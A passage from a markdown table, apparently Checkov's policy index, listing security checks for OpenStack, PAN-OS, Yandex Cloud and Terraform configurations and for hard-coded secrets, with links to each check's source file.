Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | -| 3586 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 3587 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | -| 3588 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 3589 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | -| 3590 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | -| 3591 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | -| 3592 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | -| 3593 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | -| 3594 | CKV_PAN_2 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml) | -| 3595 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | -| 3596 | CKV_PAN_3 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml) | -| 3597 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 3598 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | -| 3599 | CKV_PAN_4 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure DSRI is not enabled within security policies | Ansible | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml) | -| 3600 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 3601 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 3602 | CKV_PAN_5 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'application' set to 'any' | Ansible | [PanosPolicyNoApplicationAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoApplicationAny.yaml) | -| 3603 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 3604 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 3605 | CKV_PAN_6 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'service' set to 'any' | Ansible | [PanosPolicyNoServiceAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoServiceAny.yaml) | -| 3606 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 3607 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 3608 | CKV_PAN_7 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_ip' and 'destination_ip' both containing values of 'any' | Ansible | [PanosPolicyNoSrcAnyDstAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcAnyDstAny.yaml) | -| 3609 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 3610 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 3611 | CKV_PAN_8 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure description is populated within security policies | Ansible | [PanosPolicyDescription.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyDescription.yaml) | -| 3612 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 3613 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 3614 | CKV_PAN_9 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure a Log Forwarding Profile is selected for each security policy rule | Ansible | [PanosPolicyLogForwarding.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogForwarding.yaml) | -| 3615 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 3616 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 3617 | CKV_PAN_10 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session end is enabled within security policies | Ansible | [PanosPolicyLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLoggingEnabled.yaml) | -| 3618 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 3619 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | -| 3620 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 3621 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | -| 3622 | CKV_PAN_12 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Ansible | [PanosIPsecAuthenticationAlgorithms.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecAuthenticationAlgorithms.yaml) | -| 3623 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 3624 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | -| 3625 | CKV_PAN_13 | resource | tasks.paloaltonetworks.panos.panos_ipsec_profile | Ensure IPsec profiles do not specify use of insecure protocols | Ansible | [PanosIPsecProtocols.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosIPsecProtocols.yaml) | -| 3626 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3627 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3628 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | -| 3629 | CKV_PAN_14 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Ansible | [PanosZoneProtectionProfile.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneProtectionProfile.yaml) | -| 3630 | CKV_PAN_15 | resource | panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 3631 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | -| 3632 | CKV_PAN_15 | resource | tasks.paloaltonetworks.panos.panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Ansible | [PanosZoneUserIDIncludeACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosZoneUserIDIncludeACL.yaml) | -| 3633 | CKV_PAN_16 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure logging at session start is disabled within security policies except for troubleshooting and long lived GRE tunnels | Ansible | [PanosPolicyLogSessionStart.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyLogSessionStart.yaml) | -| 3634 | CKV_PAN_17 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure security rules do not have 'source_zone' and 'destination_zone' both containing values of 'any' | Ansible | [PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoSrcZoneAnyNoDstZoneAny.yaml) | -| 3635 | CKV_SECRET_1 | Artifactory Credentials | secrets | Artifactory Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3636 | CKV_SECRET_2 | AWS Access Key | secrets | AWS Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3637 | CKV_SECRET_3 | Azure Storage Account access key | secrets | Azure Storage Account access key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3638 | CKV_SECRET_4 | Basic Auth Credentials | secrets | Basic Auth Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3639 | CKV_SECRET_5 | Cloudant Credentials | secrets | Cloudant Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3640 | CKV_SECRET_6 | Base64 High Entropy String | secrets | Base64 High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3641 | CKV_SECRET_7 | IBM Cloud IAM Key | secrets | IBM Cloud IAM Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3642 | CKV_SECRET_8 | IBM COS HMAC Credentials | secrets | IBM COS HMAC Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3643 | CKV_SECRET_9 | JSON Web Token | secrets | JSON Web Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3644 | CKV_SECRET_11 | Mailchimp Access Key | secrets | Mailchimp Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3645 | CKV_SECRET_12 | NPM tokens | secrets | NPM tokens | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3646 | CKV_SECRET_13 | Private Key | secrets | Private Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3647 | CKV_SECRET_14 | Slack Token | secrets | Slack Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3648 | CKV_SECRET_15 | SoftLayer Credentials | secrets | SoftLayer Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3649 | CKV_SECRET_16 | Square OAuth Secret | secrets | Square OAuth Secret | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3650 | CKV_SECRET_17 | Stripe Access Key | secrets | Stripe Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3651 | CKV_SECRET_18 | Twilio API Key | secrets | Twilio API Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3652 | CKV_SECRET_19 | Hex High Entropy String | secrets | Hex High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3653 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | -| 3654 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3655 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3656 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3657 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3658 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3659 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3660 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3661 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3662 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3663 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | -| 3664 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | -| 3665 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | -| 3666 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | -| 3667 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | -| 3668 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | -| 3669 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | -| 3670 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | -| 3671 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | -| 3672 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | -| 3673 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3674 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3675 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3676 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3677 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3678 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3679 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3680 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3681 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 3682 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 3683 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | -| 3684 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | -| 3685 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | -| 3686 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | -| 3687 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | -| 3688 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | -| 3689 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | -| 3690 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 3691 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 3692 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | -| 3693 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 3694 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 3695 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | 